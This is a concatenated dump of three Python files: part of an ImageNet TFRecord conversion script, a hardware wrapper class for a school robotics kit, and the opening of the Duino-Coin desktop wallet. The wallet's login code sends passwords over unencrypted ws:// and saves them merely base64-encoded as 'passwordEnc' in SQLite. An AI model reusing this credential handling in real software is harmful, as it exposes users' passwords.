self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that converts CMYK JPEG data to RGB JPEG data.
self._cmyk_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_jpeg(self._cmyk_data, channels=0)
self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg,
feed_dict={self._png_data: image_data})
def cmyk_to_rgb(self, image_data):
return self._sess.run(self._cmyk_to_rgb,
feed_dict={self._cmyk_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg,
feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
# File list from:
# https://groups.google.com/forum/embed/?place=forum/torch7#!topic/torch7/fOSTXHIESSU
return 'n02105855_2933.JPEG' in filename
def _is_cmyk(filename):
"""Determine if file contains a CMYK JPEG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a JPEG encoded with CMYK color space.
"""
# File list from:
# https://github.com/cytsai/ilsvrc-cmyk-image-list
blacklist = ['n01739381_1309.JPEG', 'n02077923_14822.JPEG',
'n02447366_23489.JPEG', 'n02492035_15739.JPEG',
'n02747177_10752.JPEG', 'n03018349_4028.JPEG',
'n03062245_4620.JPEG', 'n03347037_9675.JPEG',
'n03467068_12171.JPEG', 'n03529860_11437.JPEG',
'n03544143_17228.JPEG', 'n03633091_5218.JPEG',
'n03710637_5125.JPEG', 'n03961711_5286.JPEG',
'n04033995_2932.JPEG', 'n04258138_17003.JPEG',
'n04264628_27969.JPEG', 'n04336792_7448.JPEG',
'n04371774_5854.JPEG', 'n04596742_4225.JPEG',
'n07583066_647.JPEG', 'n13037406_4650.JPEG']
return filename.split('/')[-1] in blacklist
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
with tf.gfile.FastGFile(filename, 'rb') as f:
image_data = f.read()
# Clean the dirty data.
if _is_png(filename):
# 1 image is a PNG.
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
elif _is_cmyk(filename):
# 22 JPEG images are in CMYK colorspace.
print('Converting CMYK to RGB for %s' % filename)
image_data = coder.cmyk_to_rgb(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch index within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batch to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
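# --- Illustrative sketch (not from the original script) ----------------------
# The shard bookkeeping above in numbers: a thread that owns files
# [range_start, range_end) splits them into num_shards_per_batch contiguous
# sub-ranges, one per output shard, exactly as np.linspace does above.
def _shard_ranges_sketch(range_start, range_end, num_shards_per_batch):
  """Return the per-shard [start, end) file-index pairs for one thread."""
  edges = np.linspace(range_start, range_end,
                      num_shards_per_batch + 1).astype(int)
  return list(zip(edges[:-1], edges[1:]))
# For example, _shard_ranges_sketch(0, 640, 64) yields 64 ranges of 10 files.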
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
  # Break all images into batches with ranges [ranges[i][0], ranges[i][1]).
  spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
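# --- Illustrative sketch (not from the original script) ----------------------
# The labeling scheme above: synsets get integer labels 1..N in the order they
# appear in the labels file, with 0 reserved as the unused background class.
def _synset_label_map_sketch(challenge_synsets):
  """Return a dict mapping each synset to its 1-based integer label."""
  return {synset: index + 1
          for index, synset in enumerate(challenge_synsets)}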
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
    list might contain 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
      Note that there might exist multiple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
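# --- Illustrative sketch (not from the original script) ----------------------
# One line of the bounding box CSV maps to a single [xmin, ymin, xmax, ymax]
# float box keyed by the image file name, as parsed above.
def _parse_bbox_line_sketch(line):
  """Return (filename, [xmin, ymin, xmax, ymax]) for one CSV line."""
  parts = line.strip().split(',')
  assert len(parts) == 5, ('Failed to parse: %s' % line)
  return parts[0], [float(coord) for coord in parts[1:]]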
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
wrapper.py
|
"""
The module containing the `Robot` class
Mainly provides init routine for the brain and binds attributes of the `Robot`
class to their respective classes
"""
import json
import sys
import optparse
import os
import logging
import time
import threading
import random
from datetime import datetime
from smbus2 import SMBus
from robot import vision
from robot.cytron import CytronBoard
from robot.greengiant import GreenGiantInternal, GreenGiantGPIOPinList, GreenGiantPWM
_logger = logging.getLogger("robot")
# Path to the file with the status of the USB program copy.
# If this file exists, the code on the robot was copied from the USB stick
# this boot cycle. This is to highlight weird behaviour in the arena.
COPY_STAT_FILE = "/tmp/usb_file_uploaded"
def setup_logging(level):
"""Display the just the message when logging events
Sets the logging level to `level`"""
_logger.setLevel(level)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(level)
fmt = logging.Formatter("%(message)s")
handler.setFormatter(fmt)
_logger.addHandler(handler)
class NoCameraPresent(Exception):
"""Camera not connected."""
def __str__(self):
return "No camera found."
class Robot():
"""Class for initialising and accessing robot hardware"""
_initialised = False
def __init__(self,
wait_for_start=True,
camera=None,
max_motor_voltage=6,
logging_level=logging.INFO):
self.zone = 0
self.mode = "competition"
self._max_motor_voltage = max_motor_voltage
self._initialised = False
self._start_pressed = False
self._warnings = []
self._parse_cmdline()
setup_logging(logging_level)
        # Check if the copy stat file exists; if so, read and then delete it
try:
with open(COPY_STAT_FILE, "r") as f:
_logger.info("Robot code copied %s from USB\n", f.read().strip())
os.remove(COPY_STAT_FILE)
except IOError:
pass
self.subsystem_init(camera)
self.report_hardware_status()
self.enable_12v = True
type(self)._initialised = True
        # Allows the robot object to be set up and mutated before waiting for
        # the start signal. Dangerous, as it means the start info might not get
        # loaded depending on user code.
if wait_for_start is True:
start_data = self.wait_start()
self.zone = start_data['zone']
self.mode = start_data['mode']
else:
_logger.warning("Robot initalized but usercode running before"
"`robot.wait_start`. Robot will not wait for the "
"start button until `robot.wait_start` is called.")
def subsystem_init(self, camera):
"""Allows for initalisation of subsystems after instansating `Robot()`
Can only be called once"""
if type(self)._initialised:
raise RuntimeError("Robot object is acquires hardware locks for its"
" sole use and so can only be used once.")
self.bus = SMBus(1)
self._green_giant = GreenGiantInternal(self.bus)
self._adc_max = self._green_giant.get_fvr_reading()
self._gg_version = self._green_giant.get_version()
self.servos = GreenGiantPWM(self.bus)
self.gpio = GreenGiantGPIOPinList(self.bus, self._adc_max)
self.motors = CytronBoard(self._max_motor_voltage)
self.camera = vision.RoboConPiCamera() if camera is None else camera()
if not isinstance(self.camera, vision.Camera):
raise ValueError("camera must inherit from vision.Camera")
self._vision = vision.Vision(self.zone, camera=self.camera)
def report_hardware_status(self):
"""Print out a nice log message at the start of each robot init with
the hardware status"""
battery_voltage = self._green_giant.get_battery_voltage()
battery_str = "Battery Voltage: %.2fv" % battery_voltage
# we cannot read voltages above 12.2v
if battery_voltage > 12.2:
battery_str = "Battery Voltage: > 12.2v"
if battery_voltage < 11.5:
self._warnings.append("Battery voltage below 11.5v, consider "
"changing for a charged battery")
if self._gg_version != 3:
self._warnings.append("Green Giant version not 3 but instead {}".format(self._gg_version))
camera_type_str = "Camera: {}".format(self.camera.__class__.__name__)
#Adds the secret poem every now and then!
if random.randint(0,100) == 1:
_logger.info("Today your task is a challenging one")
_logger.info("Gifts for the wizard and deliveries to run")
_logger.info("But due to the unfortunate timing you can not go")
_logger.info("So you have sent a robot with gifts in tow")
_logger.info("You start in your country with your gifts around")
_logger.info("Starting in your home (where ever it is found)")
_logger.info("Then taking gifts from your robots zone ")
_logger.info("Delivering it to the wizard on its own")
_logger.info("To the road is good and to the emerald palace is ideal ")
_logger.info("And if in another country you get some but a point they will steal")
_logger.info("There are many things that are to be considered")
_logger.info("But remember to bring your gifts for the wizard")
# print report of hardware
_logger.info("------HARDWARE REPORT------")
_logger.info("Time: %s", datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
_logger.info("Patch Version: 0")
_logger.info(battery_str)
_logger.info("ADC Max: %.2fv", self._adc_max)
_logger.info("Green Giant Board: Yes (v%d)", self._gg_version)
_logger.info("Cytron Board: Yes")
_logger.info("Motor Voltage: %d", self._max_motor_voltage)
_logger.info(camera_type_str)
_logger.info("---------------------------")
for warning in self._warnings:
_logger.warning("WARNING: %s", warning)
if not self._warnings:
_logger.info("Hardware looks good")
@property
def enable_12v(self):
"""Return if 12v is currently enabled
I (Edwin Shepherd) can't query this from the GG for some reason? but can
on Jacks Fallens? @will can you test this on a more default brain?
        The code below seems to make my pi reboot (most of the time).
        It will make the OS blank the screen and then go to the rainbow
        bootscreen almost instantly. Doesn't seem to matter if it is run as
        root.
        I have plugged a scope into the 5V rail to make sure that the pi
        wasn't suddenly losing power and it doesn't seem to be, maybe I'm
        missing the edge. I think it's software on the pi?
        On Jacks BB the bit doesn't change when read back even though it's set
        and unset.
import time
from smbus2 import SMBus
I2C_ADDR = 0x8
ENABLE_12V_REGISTER = 27
bus = SMBus(1)
for state in (True, False, True):
print("setting state to {}".format(state))
bus.write_byte_data(I2C_ADDR, ENABLE_12V_REGISTER, int(state))
time.sleep(1)
print("{0:b}".format(bus.read_byte_data(I2C_ADDR, ENABLE_12V_REGISTER)))
"""
return self._green_giant.enabled_12v
@enable_12v.setter
def enable_12v(self, on):
"""An nice alias for set_12v"""
return self._green_giant.set_12v(on)
def stop(self):
"""Stops the robot and cuts power to the motors.
        Does not touch the servos' position.
"""
self.enable_12v = False
self.motors.stop()
def _parse_cmdline(self):
"""Parse the command line arguments"""
parser = optparse.OptionParser()
parser.add_option("--usbkey", type="string", dest="usbkey",
help="The path of the (non-volatile) user USB key")
parser.add_option("--startfifo", type="string", dest="startfifo",
help="""The path of the fifo which start information
will be received through""")
(options, _) = parser.parse_args()
self.usbkey = options.usbkey
self.startfifo = options.startfifo
def _wait_start_blink(self):
"""Blink status LED until start is pressed"""
v = False
while not self._start_pressed:
time.sleep(0.2)
self._green_giant.set_status_led(v)
v = not v
self._green_giant.set_status_led(True)
def _get_start_info(self):
"""Get the start infomation from the fifo which was passed as an arg"""
f = open(self.startfifo, "r")
d = f.read()
f.close()
self._start_pressed = True
settings = json.loads(d)
assert "zone" in settings, "zone must be in startup info"
if settings["zone"] not in range(4):
raise ValueError(
"zone must be in range 0-3 inclusive -- value of %i is invalid"
% settings["zone"])
self._start_pressed = True
return settings
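    # Illustrative note (not from the original source): the start fifo is
    # expected to carry a small JSON object which __init__ unpacks into
    # self.zone and self.mode after wait_start() returns it, e.g.:
    #
    #     {"zone": 2, "mode": "competition"}
    #
    # "zone" must be an integer in 0-3; the "mode" value shown is only the
    # default assumed from __init__.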
def wait_start(self):
"""Wait for the start signal to happen"""
if self.startfifo is None:
self._start_pressed = True
_logger.info("No startfifo so using defaults (Zone: {})".format(self.zone))
return
blink_thread = threading.Thread(target=self._wait_start_blink)
blink_thread.start()
_logger.info("\nWaiting for start signal...")
# This blocks till we get start info
start_info = self._get_start_info()
_logger.info("Robot started!\n")
return start_info
def see(self) -> vision.Detections:
"""Take a photo, detect markers in sene, attach RoboCon specific
properties"""
return self._vision.detect_markers()
def __del__(self):
"""Frees hardware resources held by the vision object"""
logging.warning("Destroying robot object")
        # If vision was never initialised this creates confusing errors
        # so check that it is initialised first
if hasattr(self, "_vision"):
self._vision.stop()
type(self)._initialised = False
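# --- Illustrative usage sketch (not part of the original module) -------------
# A minimal session using only methods defined above; requires the actual
# robot hardware (SMBus, Cytron board, camera) to be present.
if __name__ == "__main__":
    robot = Robot()            # blocks on the start button via wait_start()
    detections = robot.see()   # one frame of marker detections
    _logger.info("Markers seen: %s", detections)
    robot.stop()               # cut 12v and stop the motors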
|
Wallet.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Tkinter GUI Wallet (v2.52)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
import sys
from base64 import b64decode, b64encode
from configparser import ConfigParser
from datetime import datetime
from json import loads
from json import loads as jsonloads
from locale import getdefaultlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path, system
from pathlib import Path
from socket import socket
from sqlite3 import connect as sqlconn
import subprocess
from threading import Thread, Timer
from time import sleep, time
from tkinter import (BOTH, END, LEFT, RIGHT, Button, Checkbutton, E, Entry,
Frame, IntVar, Label, Listbox, N, PhotoImage, S,
Scrollbar, StringVar, Tk, Toplevel, W, messagebox, ttk)
from tkinter.font import Font
from urllib.request import urlopen, urlretrieve
from webbrowser import open_new_tab
from requests import get
# The names below are used by the crypto, websocket and image code further
# down; the original wallet installs and imports these third-party modules on
# demand, so this block is an assumed equivalent of that step.
import secrets
import websocket
from PIL import Image, ImageTk
from base64 import urlsafe_b64encode as b64e, urlsafe_b64decode as b64d
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
backend = default_backend()
# Version number
VERSION = 2.52
# Colors
BACKGROUND_COLOR = "#121212"
FONT_COLOR = "#fffdee"
FOREGROUND_COLOR = "#ff9f43"
FOREGROUND_COLOR_SECONDARY = "#fdcb6e"
# Minimum transaction amount to be saved
MIN_TRANSACTION_VALUE = 0.00000000001
# Minimum transaction amount to show a notification
MIN_TRANSACTION_VALUE_NOTIFY = 0.5
# Resources folder location
resources = "Wallet_" + str(VERSION) + "_resources/"
ENCRYPTION_ITERATIONS = 100_000
config = ConfigParser()
wrong_passphrase = False
global_balance = 0
oldbalance = 0
balance = 0
unpaid_balance = 0
profitCheck = 0
curr_bal = 0
WS_URI = "ws://server.duinocoin.com:15808"
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
def get_duco_price():
global duco_fiat_value
jsonapi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if jsonapi.status_code == 200:
try:
content = jsonapi.content.decode()
contentjson = loads(content)
duco_fiat_value = round(float(contentjson["Duco price"]), 4)
except Exception:
duco_fiat_value = 0.003
else:
duco_fiat_value = 0.003
Timer(30, get_duco_price).start()
def title(title):
if osname == "nt":
system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def _derive_key(
password: bytes,
salt: bytes,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
        iterations=iterations,
backend=backend)
return b64e(kdf.derive(password))
def password_encrypt(
message: bytes,
password: str,
iterations: int = ENCRYPTION_ITERATIONS) -> bytes:
salt = secrets.token_bytes(16)
key = _derive_key(
password.encode(),
salt,
        iterations)
return b64e(
b"%b%b%b" % (
salt,
            iterations.to_bytes(4, "big"),
b64d(Fernet(key).encrypt(message))))
def password_decrypt(
token: bytes,
password: str) -> bytes:
decoded = b64d(token)
    salt, iterations, token = decoded[:16], decoded[16:20], b64e(
        decoded[20:])
    iterations = int.from_bytes(iterations, "big")
    key = _derive_key(
        password.encode(),
        salt,
        iterations)
return Fernet(key).decrypt(token)
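# --- Illustrative sketch (not part of the original wallet) -------------------
# The token layout used above is base64(salt[16] || iterations[4, big-endian]
# || decoded Fernet token), so a round trip only needs the passphrase.
def _password_roundtrip_sketch():
    secret = b"duco wallet test"
    token = password_encrypt(secret, "correct horse battery staple")
    assert password_decrypt(token, "correct horse battery staple") == secret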
def get_string(string_name):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def openTos(handler):
open_new_tab("https://github.com/revoxhere/duino-coin#terms-of-usage")
def openGitHub(handler):
open_new_tab("https://github.com/revoxhere/duino-coin")
def openWebsite(handler):
open_new_tab("https://duinocoin.com")
def openExchange(handler):
open_new_tab("https://revoxhere.github.io/duco-exchange/")
def openDiscord(handler):
open_new_tab("https://discord.com/invite/kvBkccy")
def openTransaction(hashToOpen):
open_new_tab("https://explorer.duinocoin.com/?search="+str(hashToOpen))
class LoginFrame(Frame):
def __init__(self, master):
super().__init__(master)
messagebox.showerror(title="Warning",
message=("CLI and GUI wallets are being deprecated in favor of the Web Wallet. "
+ "This app may not run properly."))
master.title("Login")
master.resizable(False, False)
TEXT_FONT_BOLD = Font(size=12, weight="bold")
TEXT_FONT = Font(size=12, weight="normal")
self.duco = ImageTk.PhotoImage(Image.open(resources + "duco.png"))
self.duco.image = self.duco
self.ducoLabel = Label(
self, background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
image=self.duco)
self.ducoLabel2 = Label(
self,
background=FOREGROUND_COLOR,
foreground=FONT_COLOR,
text=get_string("welcome_message"),
font=TEXT_FONT_BOLD)
self.spacer = Label(self)
self.label_username = Label(
self,
text=get_string("username"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.label_password = Label(
self,
text=get_string("passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
padx=5)
self.entry_username = Entry(
self,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.entry_password = Entry(
self,
show="*",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FOREGROUND_COLOR_SECONDARY)
self.ducoLabel.grid(
row=0,
sticky="nswe",
pady=(5, 0),
padx=(5))
self.ducoLabel2.grid(
row=1,
sticky="nswe",
padx=(5))
self.label_username.grid(
row=4,
sticky=W,
pady=(5, 0))
self.entry_username.grid(
row=5,
sticky=N,
padx=(5))
self.label_password.grid(
row=6,
sticky=W)
self.entry_password.grid(
row=7,
sticky=N)
self.logbtn = Button(
self,
text=get_string("login"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._login_btn_clicked,
font=TEXT_FONT_BOLD)
self.logbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(5, 1))
self.regbtn = Button(
self,
text=get_string("register"),
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
command=self._register_btn_clicked,
font=TEXT_FONT_BOLD)
self.regbtn.grid(
columnspan=2,
sticky="nswe",
padx=(5),
pady=(0, 5))
self.configure(background=BACKGROUND_COLOR)
self.master.bind(
"<Return>",
self._login_btn_clicked_bind)
self.pack()
def _login_btn_clicked_bind(self, event):
self._login_btn_clicked()
def _login_btn_clicked(self):
global username, password
username = self.entry_username.get()
password = self.entry_password.get()
if username and password:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv().decode()
response = response.rstrip("\n").split(",")
if response[0] == "OK":
passwordEnc = b64encode(bytes(password, encoding="utf8"))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO
UserData(username, password, useWrapper)
VALUES(?, ?, ?)""",
(username, passwordEnc, "False"))
con.commit()
root.destroy()
else:
messagebox.showerror(
title=get_string("login_error"),
message=response[1])
else:
messagebox.showerror(
title=get_string("login_error"),
message=get_string("fill_the_blanks_warning"))
def _registerprotocol(self):
emailS = email.get()
usernameS = username.get()
passwordS = password.get()
confpasswordS = confpassword.get()
if emailS and usernameS and passwordS and confpasswordS:
if passwordS == confpasswordS:
soc = websocket.create_connection(WS_URI)
soc.recv().decode()
soc.send(
bytes(
"REGI,"
+ str(usernameS)
+ ","
+ str(passwordS)
+ ","
+ str(emailS),
encoding="utf8"))
response = soc.recv().decode().rstrip("\n")
response = response.split(",")
if response[0] == "OK":
messagebox.showinfo(
title=get_string("registration_success"),
message=get_string("registration_success_msg"))
